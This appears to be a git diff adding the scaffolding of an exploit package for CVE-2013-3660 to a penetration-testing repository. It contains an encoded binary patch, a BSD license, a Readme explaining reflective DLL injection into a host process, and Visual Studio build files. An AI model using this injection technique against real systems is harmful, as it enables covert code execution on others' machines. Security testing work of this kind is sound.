zuN%QRjiSvcH-bJ(9LIgsa`9H|C@pSJ1!iq8?{w`QK&w)FnU;_Gb0DS<WKpS}q}ivV
z+gXo@8=^#Zz_cx7r$}ecZ105x{UQENrPBl{la-^IHyHAF8@9`|0gazY|BL8L=aOiS
zLozm{V78-xv5NdOPLcG<DnwvU$&NN4ghm0H6~<+2T4s_=T$UysKB0ZiULT06se_~!
zG-lK2oyZ@b(9h4FF3l%tt{SHpZs#_xPdx6Z;`OdWy95l`P@kf)E(kwelNG1YiAFk8
zGBkRa*4@lQ+SMTo>fdxvmx}im(EUT(&+$2GxYclJ=8+DUZVERqW~q4Wk5$9%OW|-Y
zqVPp5H63m#+{@rHxcC<bn|(h^#apQv2e%*G-3wVN{@c%H!^Pht*^c{IDhIb3ZhyGJ
z`FM>e++w&i+2Y|&f|~}Hp55&YmmdE=_A{1RV)PA~B~hQLGwM7BVN`F^D&(<iaB>(q
zNV7?U&Dm8ku4qOdpS@#U0Vf?<#)<oV$c-r18>whMLzddiO|%*fX->qi)5zDggaYI<
z=WqQD+NGVS*+B2y!9fb0&rI}R^XwdcdS4;#oX>R5V5gp)(@$d^Cw*V#Y|caq(^<#a
z1O4Z0&UpTF8o;`=KDBbg*R26b)7sCZvpnK0NbdBcj<ZM7*`4wHRNpUmepU~llG1R-
zOC(>%bt+y5@_CM~>CdjV9jQ`T$F+Htltfl=>a^*%&$wgeovlCm@m;g-{>eSF@BQhV
zx$}NDf5CkV?_ad|=S!9@TmHa`2OnCwYW2g9tog++*RFeX{jWAW_V^QRzkc#J8#g`m
z+s#{^-nwo3Gr!yM>~lMJJ^#XsyI=bK%X?mV^$&Yr+xN%)fBN(52i`dN=Apm5b@<3%
zkN)l0+wc7S_`C1D|G_{0`QeF={`K#ZAAj;GOX`uF((}A;od3;U-|F4x+ZUu>*!QBe
zi!Zq}{j$ry)9;EazsvO>FmO=DRo~0J`uo=m9+EYb7c8PAE2?I-W!oK2SB|@;)}z<e
zH+XMq^fmbd!J9+jNOZ!)=9Wog$Ng~pjn&=9-!l2uDYyN%>;K;_|4Yk1cUWG2!SHJf
zi>|xAxMal0(otpQ6?k<@)emkk<==h${|fnI@jJH0UFr3E0u#$4?uZxbLI@un)<Yv}
zZqjQbMgF=#sL6<^M4v%iu{#{et&Mmm=%s;RG-!mGev=F<!K%5tULO`{u4JRJRzs`u
zUDxBO|9x5Y?_RuTrT#1rYf~eD(YU`K1b+Gq`P@gZK4zW6+=z;ymg|RBmEu<%I;N<+
zA{STMP<5!r6_n;y6pkEr9f$n|w~q^X{q;PjHwS$IZ=~1h3gsg13EprZr?x5BT-#8u
z)nwHMng(;hP@q2KZfeqN0xdc9O>VD`!Z|SA%a}xth>VKrp_U?lL=R1H`_Q&^ULRH_
z{Sl9k)+J-{<t<?>WhS&MwZ-Z4=47CG<8i0tquB0fW?s!XoLokj(iFOV`QC8Q9jR@o
zaMut=n6HP6{N9My?K7#i@3oYM%k(-ur2A|2(vY_atEUx#M%|C}#eqO$G#E=btR;3)
z<iQ%FH(ZM)+mP<z++0YHa9)2n5{g1a1AfjO;iwYE=8ijpBvGg~n5oq{YL>Esypd)3
zW<5D>h|{k(M>sCW$V2{MNS~1Cuk*R<!xSIIdb3Uoy=YAiU4(O^tO;lnsv!qET*J9N
zo)Ef1R#q1FWyW|zk*M2e@R6A@u-TN)K)UA`5dha7ZwS4Ot9AQ5SmllAVa})5MFw->
zKq%DGA8WO>v>7#+D=_t@Os@@uJhV-flQEEQW}Sk~AeI->(Qm;Xv?S=$o4Fc&l2;FL
zXo&`Hq8C3IR6NTM_#>rmzqc0G!}NNupEGjmWdST8qo7Dxy`QUXsil_dkYh%aD=fQq
z1Q#&O1TD4?_qihx-EWi_4NcI^nnO+|?}i*uS6{TYaWEH(`s00obJx33Xr|YwK9s)^
z0@Tr<=qyCBDHsXU4pt%Xg^$hHBg7YVX^*U|Jiq+8#!%X-w)b;eFYkFo*?8wmw0D<h
z8&^9)A7bGJafqlW{J1jRr@O=YxR74wgBW1(ZbVPY3VLcfv4PL&GQ19q;St@_9`uM9
zMeL2aasP&Xm=xiN`|;*ZBOUqEu4JhhKw^B?{G$ipnb24sPr`NAbe9h5NH;Ly8t<NK
zFOSMua&_nO68WL{tFAqB{5{v5Iett@=Xkt0v{U(+*c+yD;&n=_M@>0PtpgI{yYfGB
zbm#c4{3lm-j!&fDSjAGO0EzUw^7p&(o#S_R;eUQz=lHJWS5E01-!=bJQ#;3ZEx&NO
z8BaW>;W{p-uH`h|(V0%ya`I=MIevR9OAS6srI?5BSJ>m9jkS~Y@esx~Ak2O*_JtDC
zU4my9jLqkcWbIeyo~iiHK2z~gN~PNy86F6g!`%9GbFRjY^)Lp1%rhEw3=XvoZhyVb
zdi03R+6qFU0CqSF$WP;Et~o&AyI3iS!xLIIxj5kV6nkqz7=UvbyO?s61UylnUWft8
zrz7lsb9~WDq7l6r{(mLM%%u^4FA*mpPhK>Hu{=J_#9;kcELTMX1}BW&*B6wHC@2;!
zS;iFQ$sTw(!;H$;!;O(ZkTJbSjBb7&>rXV{j*U@?B|_<=%L~flR7S;O6UQ&c-e(1V
zPbr2zR@$R9;A_bbxhG=mONxzJM$B8-2lnZaxHwr~b38QSuFWrs6|g;_W+t;V3we(A
zkOLk}ioG-eV>69Zfu<%1tk~;^$Tp``=%FUBAESHwd}nh4t$5(eDWm;pIf$9s5F5{!
z#|-!Sh$wq71rq8$I=LvEuh&HD>-A76<{l6|JBoTI^0hss!WWJ`>+(CghDgolVRn$O
z{ppxz$Y(q=^Y=upD)QHc^d=(A(z|K}ZV<x6AKf9ubnS16c_E;9-WPim>h7RHo~=(Q
z_vw0&U6z#i*iC>anc9|zi3rN`P<iDMj~U3=o1ksXA-$9Iyb!K1yDq13I^fUsd&+}e
zznSrUk}(9RSF{ANPhnDVV>%Y3NpK~5Dc0&;Xt0Yq>PNXpxSL4t-ATlCfq#NG6!4QE
z$|E$R4_C4adsccqdR~J&R1qkN`Xb(8EfJmVqtZ{8oIP*IAdhBgm|4AG_@L2|P@sja
zOg857rFzJ?{lawEs0&nJ4sliCt!<1+rNyX^F{iKag2S*;Q(Q4?a<T57&{Z^yy#tMa
zGIgyk3mLjtN<zV>Bv49jUMXWL(H~h*Lf5^ZU(gk=Cyx{z_jqil!L_MQzc;SSbkpZb
zv?0)pjGmQfBb~ToX{SmSDbiEQBEHf7iMSbMb=3NlHr}1sLW8@2KOFGs#LJolKTH!O
zI3&3^uf!cR+XM9KliORNA`ovH<~8JHv>E9G((N($E{7H|b|;mapksqfuJg=tD_II8
z5bLLb&~UU|G=$Eq8$IownB5_^D{;@8=L>{m_L5b?&P2lv6g4bbhdUgaFee=G=i8RI
z;l3E*aV&s;5wH{}y_B)X;NrjAohPJZJ8#5&Q*4q-wp$P7ND1W6U49M;jCd>OH;-QS
z+k8y#+K;K`HqGat(vg(f@)Cgdxd?O*LN48Nqys&HJ^-G}GoIhW6L-e*d$b?cI~GPR
zu|RS3%war^=u%#C@oEHvZfY#-Lb$Y7MxgTg1C&;d`Ez6byqF)Iicy}jSa^BNMHeyX
z{{SwPO=}56rwQPIAV7O;7@iFNsUF17RDgJ%7IUY=rM<n|0g9gi5FJb-v3rVVRAc^S
zaEad)0F}2Apma|F#NP`5#s2}I_;d(`<U=62?8P?=b^y3E`ca}w*K{PAPP-fPw);OT
z{`02qj$WM3f5WAAr{f6rG!Fp>fc?N;U=Oex*a2(?+JH5{QeXiv3upyq08@d<Kr;{l
zf`AWb06ai7Fb=2y3V|Fz11LQYWC9$J2J{9P@WDKmdK@?g8~}C!n}Khl)5K-j2LC!>
z6|fXo0L%tjfo7lqr~>i<9^io9KniejF3JFo0f&J7z#d>1unpJ<Yyj2(i-1;OG7tnP
zy$7fQ3IPci1f&8d=YTG74A={-0~P@!=Q!VV{hvJO!-t9VzO0}4?8+;>hACdgfn|{G
zL-<p~O0*HmrjO*s<GwmKwcEoilk4{Q>UjD(DR;k_V{*~`YWUa5<yTu)w<-|Rziw54
z`)c|6nyLRER|Wb?SW=Ia^H*RZR6V_AdjFXC9(vupSoWalPFr$-9=%~XQ>Gg3Dx}}?
zz`h4KGy0U@X`h%uIWhOKvrL~GOaD01zqtI+^2^y@mLFL@wtM<hmKixlVd6Gw-}rqT
zyK&!5`z)uXe|hhp4}8R!FvaAoKi)rcHkeB9PsKrQQlcR~jg_T&P-2p<Oi(=G+;L6<
zXDfmDx^g@{wy*GX8lKU^93UO9^7$;>7CX|Az8}(e2bxpRT;kvZc%@mqFt}XLImV-W
z@t{M9k6)8Z{E^NRPiNA7O8aFFOf_*N8TV+oPn&9Z@e>axp83;+(;Suds;YLUup7YO
zAu|KByTf7phs4*yH8=VEVaI@I$ZreRHt0?6@Q@~NZ72{9)J2A1x6bAcH)Tx_25?wB
z^wwcXXbct%u&m`6AY}0aoPBz6oE<xyVPkjxEUAfRKI9DRwNWg^v>0?~$h3#_oAKWf
z?2cm3bpn<s>h*AYWMXtdGqTe9S~0fgeAuDHuVa84d$|*^OB))%MZLMkKBZ$oo!b}I
z2RQ9R+i7>s+)h6s#VMuRhj!xCKD52k$Zj7Rm#4Edw=_3Dzi7m@RaLQzFXJa|Yeu^j
z@YnNW`0;!LKaszcZ{;85H}OyN&+~iuKk^6pxB2(@kN6)7e&H73cA-_6Ei4cg3(JM|
zLYuHjcv^T?cv*N&cwKl)cvtvPxY#nt;<OZ4$}M9p4VIwgR?8ihC6@J;Ut6|W{%AR9
zIc9m!(o4KZ<ix8*S*#In7FUaH;%~**#Dn5H;)i0gbiQ<{#7UV_mLy3|saP5<)kqCe
zRGK2)CC!)COKs9_=~d}Z(jn<@(g)H>DMkLKe7P*kcDYQxL3Yal`4+iVo+mGrACe!D
z*UKB_t?~|exBQxXM1D`cM7dJQP%KKelA}ygo>2}chm<4AG36U-Uo}%r%RZ2uZok6*
zJ^NUD*nW$BhJBO$UHgajkL`UO`HpHwvty^@grm;sbB3JF&MD3r&bypHb>8P(>Rjpk
zrSmc8Cg*nN^Ul|t2c3tVZ#zG9GS|0Um%9472D=28>T<ZsT{pPUVL1G!7II(6Z{=-5
zu23SB3pWZnBpeZL6@Db#Bg}_{R|{)}jlwg+F5y+-gwV$#TEdnV%LA6xmbI4cmOojN
z#aqRt;=_>JQBjeGLsC`Jc*!qCq)F0`AgN{2N@<hywDcV0^#?;<N2T|qkEBne^W+QU
z@5r2-Azvd8h2(5<j$9yD$T!JBxmmtdzC-@8{8M?p{B!vikYAg;MSep*EPpD0U*VNu
zicg6u)08%4i}Jj3o_c}$9aU8w>TtD04XB6IW9p}BFYN-YzjlqrYsK0a&8JP&?$s7)
zE3^&TliE%##rkclWX-mYwvMyjX+6(2*k-Yfvn{i&vTd@ZWPdx`nmsBzkUb}RYxXPI
z$@Z)4gYCI?w|%DlUi(t}Ui(4&Ku4BCa}+r$9BHl$*ASQJ(p*m0!>)C%U9JyYWT+-X
z#5sI1KbEiNr|~oSU-C~v($DfQ@^A2;@MXeai)1Ob)LWji43l&z1kIW${X|+QZIyOH
zvksuHMaozuTP;w_)Y<BMb%pw{dRR@?uF|a9J=%P2jrN3gx0SbzutjWpZO3hwWM?@u
zs9kf+ZNbOUUowQ@!qwtD`968Eyi9&jUJY43YUtwg^6T<H<rJltGDMM-62-05D?#OU
zWu<Z$WsX%F)hE>Rv=Q2JO}Eame#@3&Q)~g-$2J?}vc>*;dvC{Oj)4xrVS`3CJ8pN}
z?Rdzs&au^T*m0$^+*#**)%m{D?s~-aoQwYCdH`&>(7(s?LH;g&4u3ztp5MtI=8yCL
z<Ui$8go^~5Pz$}gSJ(_)dqpU-R9R{)yDhJxuU;k!Vu3hWoG#ue&J!1kOT-o82Jubt
zuj0F+COM>u(q!p&sa3j1nky}rlI7lVUwI*F+9q$8cgn}*51}&wC8FG_%u?1W8<bxw
zyOm5eOO@0k>f6whD>Ok<wbj~2?FH>(>kzAIEwkQWt+x8D%dKmz+pPbv_O*?-&9Y_K
z1-l)!{FP&u<EY~*=LqK;&K%d9E>>->(IxZm^ZkUV@TO&xc(?SFv`4yFmgJY@WaS!V
zwbDoB)nRI(TBF{qPEmiXE>xGP>(q_vvjz`+v;o>+txUT^o2xC>wrIz-9P9nohpbPc
zW$$(^aXsqV>UzcXZx=28oq#O+@ZaSHK93*G*Yhoq=wf~?zlDF9?=6fL-VvU%XyRD$
z196HpLs~2ymHL5?Y&lOZl#At3xkX+gZ<4pc8tsBT+9U6k_sa*2UL`4-Vpo<czfg84
zFDiSKy~=*&W957557cVaqc*5MHK<0^W_7aqjJiwRt?p6xsv`Q9TdPO!nylTe&C~AJ
z9@HMu9@BoKZHGKx)Bda-*51`lYN~aVwb9y?9m$@Qy(arYShsohwe~jqQCPK$9kQbp
z+ViaAFOI%Wm-9MUwVBSj&SlQc&IZ@3q|;OJUjaB-{7Alvzm1>8-^(xIC&50g5_Srg
zThhfVM6x+8(rwagsVD0A0PO8Yko}$NHuVMdE%gE|SMzF*TR~(tJ@*gWCsYd_p#fUg
zEUXhY2ocw0*9_Mz*Id^k*9zAf*9O-{*EaO#J+A$(L#|`!)hAtSDgJwpyeWKdK8^3k
z?{VyPG{FA0I#)S2ICneuJ5M;%VF{{S&7iZu)#loZd?#FNow;V4&THVmnP0%K;5YLJ
zcqV|@W;|a2JG@!gCLFhXU^!tqX<=fDc)r+MOcm3_bg>`CsX=0<I9TLGNz_EUm?P$k
zg<`Q-DprV9;yAHd^oR|jPYj9?u^D}3syIVz6=#XF#kt}Fah146T!%i>CT_%M<hF@B
z#9iWUagVrH+%Fyw4~a*_W8!h>%L(zM$fOjEeZ8erDNRb3`e6(lgi&y?#A6)PB)gO&
z<x7RI@}<%`X)|p40qMAu1}i>D&Xfnsyj*Rqf*q~4d29_fpDhU6)NGq<n`&#dr91jL
zIL9DIrem;!cSx|Fc1NM3*ii}_TICpran0jsaQGZS$7~0ra_%@MfpZc#CxLSkI46N~
K68L{Cf&T${wgUzL

literal 0
HcmV?d00001

diff --git a/external/source/exploits/cve-2013-3660/LICENSE.txt b/external/source/exploits/cve-2013-3660/LICENSE.txt
new file mode 100755
index 0000000000..f217025f51
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/LICENSE.txt
@@ -0,0 +1,25 @@
+Copyright (c) 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted 
+provided that the following conditions are met:
+
+    * Redistributions of source code must retain the above copyright notice, this list of 
+conditions and the following disclaimer.
+
+    * Redistributions in binary form must reproduce the above copyright notice, this list of 
+conditions and the following disclaimer in the documentation and/or other materials provided 
+with the distribution.
+
+    * Neither the name of Harmony Security nor the names of its contributors may be used to
+endorse or promote products derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+POSSIBILITY OF SUCH DAMAGE.
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/Readme.md b/external/source/exploits/cve-2013-3660/Readme.md
new file mode 100755
index 0000000000..814e6e7517
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/Readme.md
@@ -0,0 +1,40 @@
+About
+=====
+
+Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.
+
+Injection works from Windows NT4 up to and including Windows 8, running on x86, x64 and ARM where applicable.
+
+Overview
+========
+
+The process of remotely injecting a library into a process is two fold. Firstly, the library you wish to inject must be written into the address space of the target process (Herein referred to as the host process). Secondly the library must be loaded into that host process in such a way that the library's run time expectations are met, such as resolving its imports or relocating it to a suitable location in memory.
+
+Assuming we have code execution in the host process and the library we wish to inject has been written into an arbitrary location of memory in the host process, Reflective DLL Injection works as follows.
+
+* Execution is passed, either via CreateRemoteThread() or a tiny bootstrap shellcode, to the library's ReflectiveLoader function which is an exported function found in the library's export table.
+* As the library's image will currently exists in an arbitrary location in memory the ReflectiveLoader will first calculate its own image's current location in memory so as to be able to parse its own headers for use later on.
+* The ReflectiveLoader will then parse the host processes kernel32.dll export table in order to calculate the addresses of three functions required by the loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc.
+* The ReflectiveLoader will now allocate a continuous region of memory into which it will proceed to load its own image. The location is not important as the loader will correctly relocate the image later on.
+* The library's headers and sections are loaded into their new locations in memory.
+* The ReflectiveLoader will then process the newly loaded copy of its image's import table, loading any additional library's and resolving their respective imported function addresses.
+* The ReflectiveLoader will then process the newly loaded copy of its image's relocation table.
+* The ReflectiveLoader will then call its newly loaded image's entry point function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully loaded into memory.
+* Finally the ReflectiveLoader will return execution to the initial bootstrap shellcode which called it, or if it was called via CreateRemoteThread, the thread will terminate.
+
+Build
+=====
+
+Open the 'rdi.sln' file in Visual Studio C++ and build the solution in Release mode to make inject.exe and reflective_dll.dll
+
+Usage
+=====
+
+To test use the inject.exe to inject reflective_dll.dll into a host process via a process id, e.g.:
+
+> inject.exe 1234
+	
+License
+=======
+
+Licensed under a 3 clause BSD license, please see LICENSE.txt for details.
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.sln b/external/source/exploits/cve-2013-3660/dll/reflective_dll.sln
new file mode 100755
index 0000000000..eff992d77c
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/dll/reflective_dll.sln
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 10.00
+# Visual C++ Express 2008
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj
new file mode 100755
index 0000000000..33c6bd9515
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj
@@ -0,0 +1,357 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="9.00"
+	Name="reflective_dll"
+	ProjectGUID="{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
+	RootNamespace="reflective_dll"
+	Keyword="Win32Proj"
+	TargetFrameworkVersion="196613"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+		<Platform
+			Name="x64"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="2"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Debug|x64"
+			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
+			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+				TargetEnvironment="3"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="2"
+				TargetMachine="17"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="2"
+				InlineFunctionExpansion="1"
+				EnableIntrinsicFunctions="true"
+				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
+				RuntimeLibrary="0"
+				EnableFunctionLevelLinking="true"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="1"
+				GenerateDebugInformation="true"
+				SubSystem="2"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+				CommandLine="copy ..\Release\reflective_dll.dll ..\bin\"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|x64"
+			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
+			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="0"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+				TargetEnvironment="3"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="2"
+				InlineFunctionExpansion="1"
+				EnableIntrinsicFunctions="true"
+				FavorSizeOrSpeed="2"
+				WholeProgramOptimization="false"
+				PreprocessorDefinitions="WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;_WIN64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
+				RuntimeLibrary="0"
+				EnableFunctionLevelLinking="true"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+				CompileAs="2"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				OutputFile="$(OutDir)\$(ProjectName).x64.dll"
+				LinkIncremental="1"
+				GenerateDebugInformation="true"
+				SubSystem="2"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				TargetMachine="17"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+				CommandLine="copy $(OutDir)\$(ProjectName).x64.dll ..\bin\"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\src\ReflectiveDll.c"
+				>
+			</File>
+			<File
+				RelativePath=".\src\ReflectiveLoader.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+			<File
+				RelativePath=".\src\ReflectiveDLLInjection.h"
+				>
+			</File>
+			<File
+				RelativePath=".\src\ReflectiveLoader.h"
+				>
+			</File>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
new file mode 100755
index 0000000000..d01f1db543
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
@@ -0,0 +1,264 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|ARM">
+      <Configuration>Debug</Configuration>
+      <Platform>ARM</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
